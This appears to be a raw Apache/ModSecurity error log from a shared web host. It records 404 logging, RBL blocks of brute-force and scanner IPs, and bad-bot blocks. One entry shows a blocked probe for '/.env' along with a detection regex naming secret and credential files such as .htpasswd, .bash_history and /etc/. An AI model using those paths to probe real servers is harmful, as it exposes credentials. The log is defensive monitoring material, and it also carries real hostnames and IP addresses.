[Tue May 26 17:51:16.913788 2026] [security2:error] [pid 937900:tid 938093] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTNQAAxHw"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.917161 2026] [security2:error] [pid 937900:tid 938115] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTMgAA2nc"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.917771 2026] [security2:error] [pid 937900:tid 938077] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTNAAAtHo"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.927917 2026] [security2:error] [pid 937900:tid 938137] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTOQAA8H0"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.928999 2026] [security2:error] [pid 937900:tid 938136] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTOgAA710"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.929326 2026] [security2:error] [pid 937900:tid 938139] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTOAAA8mM"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.931820 2026] [security2:error] [pid 937900:tid 938051] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTQgAAmj0"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.934511 2026] [security2:error] [pid 937900:tid 938060] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTQAAAoxc"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.936181 2026] [security2:error] [pid 937900:tid 938072] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTQwAArwE"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.938350 2026] [security2:error] [pid 937900:tid 938101] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTOwAAzAo"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.940698 2026] [security2:error] [pid 937900:tid 938105] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTNgAA0AA"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.941655 2026] [security2:error] [pid 937900:tid 938043] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTPgAAkmU"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.944256 2026] [security2:error] [pid 937900:tid 938145] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTMAAA-Hs"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.947615 2026] [security2:error] [pid 937900:tid 938030] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTRgAAhS4"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.947713 2026] [security2:error] [pid 937900:tid 938099] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTRQAAymk"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.948759 2026] [security2:error] [pid 937900:tid 938058] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTRAAAoSg"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.957157 2026] [security2:error] [pid 937900:tid 938045] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTQQAAlDo"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.964080 2026] [security2:error] [pid 937900:tid 938050] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTPAAAmQk"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:17.007212 2026] [security2:error] [pid 937900:tid 938132] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTTAAA638"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:17.033261 2026] [security2:error] [pid 937900:tid 938135] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTTgAA7jc"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:17.038966 2026] [security2:error] [pid 937900:tid 938103] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTTQAAzmo"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:17.048373 2026] [security2:error] [pid 937900:tid 938128] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPU4hPNS8CpkGLtbTTwAA5wI"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:19.472490 2026] [security2:error] [pid 937900:tid 938135] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQP04hPNS8CpkGLtbTjAAAAO4"]
[Tue May 26 17:51:19.919025 2026] [security2:error] [pid 937900:tid 938122] [client 80.94.95.173:58532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.95.94.80.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWQP04hPNS8CpkGLtbTqQAAAOE"], referer: https://anujtradingco.com/contact-us/
[Tue May 26 17:51:20.191254 2026] [security2:error] [pid 937900:tid 937980] [remote 157.143.84.87:50008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 87.84.143.157.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.com"] [uri "/xmlrpc.php"] [unique_id "ahWQP04hPNS8CpkGLtbTpgAApk8"]
[Tue May 26 17:51:20.873907 2026] [security2:error] [pid 937900:tid 938044] [client 176.65.139.236:38916] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.shardagalaxy.com"] [uri "/.env"] [unique_id "ahWQQE4hPNS8CpkGLtbTyAAAAJM"]
[Tue May 26 17:51:21.851840 2026] [security2:error] [pid 937900:tid 937952] [remote 123.30.233.13:58684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWQQU4hPNS8CpkGLtbT4QAAhTM"]
[Tue May 26 17:51:21.959872 2026] [security2:error] [pid 937900:tid 938136] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQQU4hPNS8CpkGLtbT3wAAAO8"]
[Tue May 26 17:51:24.324800 2026] [security2:error] [pid 937900:tid 938077] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQQ04hPNS8CpkGLtbULgAAALQ"]
[Tue May 26 17:51:24.550199 2026] [security2:error] [pid 937900:tid 938074] [client 91.235.199.219:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQRE4hPNS8CpkGLtbUNQAAALE"]
[Tue May 26 17:51:25.820520 2026] [security2:error] [pid 937900:tid 937937] [remote 51.91.98.45:35978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWQRU4hPNS8CpkGLtbUaAAAviQ"]
[Tue May 26 17:51:26.479319 2026] [security2:error] [pid 937900:tid 938089] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQRk4hPNS8CpkGLtbUcwAAAMA"]
[Tue May 26 17:51:29.730492 2026] [security2:error] [pid 937900:tid 938034] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQSU4hPNS8CpkGLtbU1wAAAIk"]
[Tue May 26 17:51:30.581043 2026] [security2:error] [pid 937900:tid 938095] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQSk4hPNS8CpkGLtbU8AAAAMY"]
[Tue May 26 17:51:31.138367 2026] [core:error] [pid 937900:tid 938014] [remote 74.7.241.141:53918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:51:31.138388 2026] [core:error] [pid 937900:tid 938014] [remote 74.7.241.141:53918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:51:31.138593 2026] [security2:error] [pid 937900:tid 938097] [client 74.7.241.141:53918] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.surat.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWQS04hPNS8CpkGLtbVEgAAyHE"]
[Tue May 26 17:51:31.714873 2026] [proxy:warn] [pid 937900:tid 938083] [client 66.132.172.223:31024] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 17:51:31.714909 2026] [proxy:error] [pid 937900:tid 938083] (70014)End of file found: [client 66.132.172.223:31024] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 66.132.172.223 ()
[Tue May 26 17:51:32.478993 2026] [autoindex:error] [pid 937900:tid 938144] [client 66.132.172.223:0] AH01276: Cannot serve directory /home2/debatqhn/couplesspot.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:51:33.272816 2026] [security2:error] [pid 937900:tid 938142] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQTE4hPNS8CpkGLtbVTQAAAPU"]
[Tue May 26 17:51:34.317921 2026] [security2:error] [pid 937900:tid 937976] [remote 154.66.198.148:51440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWQTk4hPNS8CpkGLtbVdQAAl0s"]
[Tue May 26 17:51:34.628536 2026] [security2:error] [pid 937900:tid 938139] [client 51.77.74.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWQTk4hPNS8CpkGLtbVhwAAAPI"]
[Tue May 26 17:51:34.768999 2026] [security2:error] [pid 937900:tid 938107] [client 92.222.104.210:46366] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "mexicoimportaciones.com"] [uri "/robots.txt"] [unique_id "ahWQTk4hPNS8CpkGLtbVkQAAANI"]
[Tue May 26 17:51:34.769137 2026] [security2:error] [pid 937900:tid 938107] [client 92.222.104.210:46366] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "mexicoimportaciones.com"] [uri "/robots.txt"] [unique_id "ahWQTk4hPNS8CpkGLtbVkQAAANI"]
[Tue May 26 17:51:35.186398 2026] [security2:error] [pid 937900:tid 938088] [client 192.241.115.46:45459] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWQT04hPNS8CpkGLtbVmAAAAL8"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 17:51:35.888238 2026] [security2:error] [pid 937900:tid 938098] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQT04hPNS8CpkGLtbVpQAAAMk"]
[Tue May 26 17:51:36.137899 2026] [security2:error] [pid 937900:tid 938095] [client 51.161.37.242:46178] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "mexicoimportaciones.com"] [uri "/"] [unique_id "ahWQUE4hPNS8CpkGLtbVtwAAAMY"]
[Tue May 26 17:51:36.138092 2026] [security2:error] [pid 937900:tid 938095] [client 51.161.37.242:46178] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "mexicoimportaciones.com"] [uri "/"] [unique_id "ahWQUE4hPNS8CpkGLtbVtwAAAMY"]
[Tue May 26 17:51:38.119821 2026] [security2:error] [pid 937900:tid 938083] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQUU4hPNS8CpkGLtbV3wAAALo"]
[Tue May 26 17:51:39.632911 2026] [security2:error] [pid 937900:tid 938068] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWIAAAq3o"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.634032 2026] [security2:error] [pid 937900:tid 938093] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWHgAAxDE"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.639580 2026] [security2:error] [pid 937900:tid 938089] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWHAAAwHU"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.641629 2026] [security2:error] [pid 937900:tid 938039] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWIgAAjnc"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.645989 2026] [security2:error] [pid 937900:tid 938080] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWJAAAt2M"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.646478 2026] [security2:error] [pid 937900:tid 938125] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWIQAA5Gc"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.650351 2026] [security2:error] [pid 937900:tid 938036] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWJgAAiz0"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.656013 2026] [security2:error] [pid 937900:tid 938153] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWKQABAAE"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.656745 2026] [security2:error] [pid 937900:tid 938056] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWHwAAn3w"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.657909 2026] [security2:error] [pid 937900:tid 938101] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWIwAAzHY"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.658528 2026] [security2:error] [pid 937900:tid 938141] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWKAAA9Bc"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.658793 2026] [security2:error] [pid 937900:tid 938084] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWJQAAu30"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.660115 2026] [security2:error] [pid 937900:tid 938075] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWKgAAsgo"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
